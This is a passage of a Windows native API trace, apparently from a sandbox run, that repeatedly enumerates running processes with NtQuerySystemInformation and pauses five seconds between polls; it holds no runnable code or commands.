NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.239] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0279.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0279.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0279.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0279.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0279.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0279.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0279.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.493] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 